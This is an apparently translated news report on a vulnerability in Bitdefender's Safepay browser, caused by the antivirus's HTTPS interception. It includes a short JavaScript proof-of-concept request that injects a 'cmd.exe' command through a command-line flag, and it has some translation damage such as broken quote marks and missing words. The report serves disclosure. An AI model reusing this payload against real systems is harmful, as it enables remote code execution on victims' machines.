Vladimir Palant, creator of Adblock Plus, () in the Chromium-based specialized Safepay web browser offered as part of the Bitdefender Total Security 2020 anti-virus package and aimed at improving the user's safety in the global network (for example, additional isolation is provided when accessing banks and payment systems). The vulnerability allows websites opened in the browser to execute arbitrary code at the operating system level.
The reason for the problem is that Bitdefender antivirus performs local interception of HTTPS traffic by replacing the site's original TLS certificate. An additional root certificate is installed on the client system, which allows you to hide the operation of the traffic inspection system used. The anti-virus wedges itself into secure traffic and substitutes its own JavaScript code in some pages to implement the Safe Search function, and in case of problems with the secure connection certificate, it replaces the error page with its own. Since the new error page is issued on behalf of the server being opened, other pages on that server have full access to the content inserted by Bitdefender.
When an attacker-controlled site is opened, that site can send an XMLHttpRequest and feign an HTTPS certificate issue in response, which will return an error page spoofed by Bitdefender. Since the error page is opened in the context of the attacker's domain, the attacker can read the contents of the spoofed Bitdefender settings page. The page substituted by Bitdefender also contains a session key that allows using the internal Bitdefender API to launch a separate Safepay browser session, specifying arbitrary command line flags, and achieve the launch of any system commands using the β-utility-cmd-prefixβ flag. Exploit example (param1 and param2 are the values ββobtained from the error page):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(Β«BDNDSS_B67EA559F21B487F861FDA8A44F01C50Β», param1);
request.setRequestHeader(Β«BDNDCA_BBACF84D61A04F9AA66019A14B035478Β», param2);
request.setRequestHeader(Β«BDNDWB_5056E556833D49C1AF4085CB254FC242Β», Β«obk.runΒ»);
request.setRequestHeader(Β«BDNDOK_4E961A95B7B44CBCA1907D3D3643370DΒ», location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Please note that a 2017 study that 24 out of 26 antivirus products tested that inspect HTTPS traffic through certificate spoofing reduced the overall security level of the HTTPS connection.
Only 11 out of 26 products provided up-to-date cipher suites. 5 systems did not perform certificate verification (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security and Total Security products were attacked , and AVG, Bitdefender and Bullguard products are subject to attacks ΠΈ . Dr.Web Antivirus 11 allows you to roll back to unreliable export ciphers (attack ).
Source: opennet.ru